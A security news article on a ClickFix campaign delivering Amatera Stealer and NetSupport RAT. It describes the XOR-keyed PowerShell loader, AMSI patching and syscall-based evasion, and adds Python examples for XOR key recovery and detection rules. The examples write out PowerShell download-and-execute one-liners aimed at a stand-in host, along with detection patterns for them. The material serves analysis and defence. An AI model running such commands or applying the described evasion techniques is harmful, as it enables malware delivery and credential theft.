
In November 2025, a new malware campaign emerged that pairs a social engineering lure with a commercially sold information stealer.
The attack starts when criminals trick users into pasting and running a command in the Windows Run dialog (Win+R), a technique known as ClickFix.
Once users follow these instructions, their computers become infected with Amatera Stealer, a piece of malware designed to steal sensitive information from browsers, cryptocurrency wallets, and password managers.
Shortly after the initial infection, the attackers deploy NetSupport RAT, a legitimate remote administration tool abused to give them full remote access to the victim's computer.
eSentire security analysts identified the campaign and noted that it represents a significant evolution in how attackers chain multiple tools for maximum damage.
The attack chain relies on carefully crafted social engineering: attackers convince users to open the Run prompt and execute a specific command that the lure page has placed on their clipboard.
That command triggers a series of hidden stages that eventually deliver Amatera Stealer to the victim's machine. What makes this particularly dangerous is how the malware hides its true purpose.
It uses obfuscated PowerShell code that has been deliberately made difficult to read. The loader decrypts its next stage with repeating-key XOR, using the string "AMSI_RESULT_NOT_DETECTED" as the key. That string resembles an AMSI status value, so an analyst skimming the script may dismiss it as a harmless constant rather than the key that unlocks the next stage.
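The XOR unwrapping described above, as an added example that is not the campaign's code or eSentire's: a repeating-key XOR routine keyed with the reported string, plus the plausibility check an analyst uses to confirm a candidate key really yields PowerShell. The stage-two script, the wrong candidate keys and the URL are constructed stand-ins, not samples from the campaign.

```python
# Added example (not the campaign's loader): repeating-key XOR with the key
# string the article reports, and a sanity check for recovered keys.
from typing import Iterable, Optional

KEY = b"AMSI_RESULT_NOT_DETECTED"  # key string reported for this campaign


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """XOR every byte of data with the key, repeating the key as needed.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed stand-in for a next-stage script (not the real payload).
STAGE2 = b'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s2")'
ENCRYPTED_STAGE2 = xor_with_key(STAGE2, KEY)

POWERSHELL_TOKENS = (b"IEX", b"Invoke-Expression", b"New-Object",
                     b"DownloadString", b"FromBase64String")


def looks_like_powershell(blob: bytes) -> bool:
    """Cheap plausibility check: almost all printable ASCII and at least one
    PowerShell token. A wrong key produces control bytes and no tokens."""
    printable = sum(32 <= b < 127 or b in b"\r\n\t" for b in blob)
    return (printable / max(len(blob), 1) > 0.95
            and any(t in blob for t in POWERSHELL_TOKENS))


def find_key(blob: bytes, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Try each candidate key (for example every string literal pulled from
    the obfuscated loader) and return the first that yields plausible
    PowerShell, or None."""
    for key in candidates:
        if looks_like_powershell(xor_with_key(blob, key)):
            return key
    return None


if __name__ == "__main__":
    # Constructed candidate list: two decoy strings and the real key.
    key = find_key(ENCRYPTED_STAGE2, [b"NOT_DETECTED", b"password", KEY])
    print("recovered key:", key)
    print(xor_with_key(ENCRYPTED_STAGE2, key).decode())
```

In practice the candidate list comes from the string literals and `[Text.Encoding]::...GetBytes(...)` arguments in the obfuscated script; because the key is a readable ASCII string, it also makes a usable detection string for script block logs.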
One of the most concerning aspects of this campaign is the set of evasion techniques built into Amatera Stealer. The malware was originally sold as ACR Stealer, a malware-as-a-service offering run by a group called SheldIO.
Now rebranded as Amatera, the stealer issues its system calls through the WoW64 transition instead of calling the hooked user-mode APIs that antivirus and endpoint detection products monitor. Any defence that depends only on user-mode API hooks will therefore miss this activity, even on machines with strong security tools installed.
The Infection Mechanism and Detection Evasion
The infection begins with a .NET-based downloader that retrieves its payloads from file-hosting services such as MediaFire and decrypts them with RC2.
This downloader is packed with Agile.NET to slow analysis. Once executed, it deploys a PureCrypter-packed file that uses process injection to run the stealer inside another process.
The malware then disables AMSI (Anti-Malware Scan Interface) by patching AmsiScanBuffer, the amsi.dll function PowerShell calls to scan script content, in memory, so nothing the rest of the attack runs is scanned by Windows' built-in script inspection.
Amatera communicates with its command servers over encrypted connections. It calls the Windows cryptography APIs, again through WoW64 syscalls, to encrypt all traffic with AES-256-CBC, so network inspection sees only ciphertext and cannot read the stolen data or the tasks sent back.
The malware packages stolen data into zip files and sends them to the attackers' servers over these channels. Through its loader functionality, it can execute additional payloads selectively on valuable targets, such as computers holding cryptocurrency wallets or machines joined to business networks.
This selective approach lets attackers avoid wasting time on low-value victims and focus on organizations with real financial assets. The campaign shows why modern security requires multiple layers: blocking or alerting on Run-dialog command execution, PowerShell script block logging, and endpoint detection that does not rely solely on user-mode API hooks each catch a stage the others may miss.
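As an added illustration of where the chain above is observable, the following detection logic is not from eSentire or the article; it runs three rules over constructed telemetry whose field names follow Sysmon (EventID 13 registry value set, EventID 1 process creation) and PowerShell script block logging (EventID 4104) conventions. The events, hostnames and URL are made up for the example.

```python
# Added example (not the article's or eSentire's code): detection rules for
# the ClickFix -> PowerShell -> XOR-stage chain, over constructed events.
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry: a Win+R paste (RunMRU write), the resulting
# PowerShell, its logged script block, and a benign control event.
EVENTS: List[Event] = [
    {"EventID": "13", "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a",
     "Details": "powershell -w hidden -c \"iex (irm http://example.invalid/x)\"\\1"},
    {"EventID": "1",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (irm http://example.invalid/x)\""},
    {"EventID": "4104",
     "ScriptBlockText": "$k=[Text.Encoding]::ASCII.GetBytes('AMSI_RESULT_NOT_DETECTED');..."},
    {"EventID": "1", "Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

SUSPICIOUS_CMD = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|"
    r"invoke-expression|\birm\b|downloadstring)", re.I)
SCRIPT_HOSTS = ("powershell", "pwsh", "mshta", "cmd", "curl", "certutil")


def runmru_rule(e: Event) -> bool:
    """Win+R history write whose value invokes a script host: the ClickFix paste."""
    return (e.get("EventID") == "13"
            and "\\Explorer\\RunMRU\\" in e.get("TargetObject", "")
            and any(h in e.get("Details", "").lower() for h in SCRIPT_HOSTS))


def explorer_spawn_rule(e: Event) -> bool:
    """explorer.exe (the Run dialog) launching PowerShell with hide/eval/download flags."""
    return (e.get("EventID") == "1"
            and e.get("ParentImage", "").lower().endswith("\\explorer.exe")
            and "powershell" in e.get("Image", "").lower()
            and bool(SUSPICIOUS_CMD.search(e.get("CommandLine", ""))))


def scriptblock_rule(e: Event) -> bool:
    """Script block logging sees the XOR key string and any AmsiScanBuffer reference
    before the AMSI patch lands, so this is often the last clean signal."""
    text = e.get("ScriptBlockText", "")
    return (e.get("EventID") == "4104"
            and ("AMSI_RESULT_NOT_DETECTED" in text or "AmsiScanBuffer" in text))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("clickfix_runmru", runmru_rule),
    ("explorer_to_powershell", explorer_spawn_rule),
    ("amsi_key_or_patch", scriptblock_rule),
]


def detect(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]


if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}")
```

The RunMRU rule fires on the user action itself, before any payload runs, which makes it the earliest and least evadable of the three; the script block rule depends on logging being enabled and on the collector receiving the block before the in-process AMSI patch takes effect.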
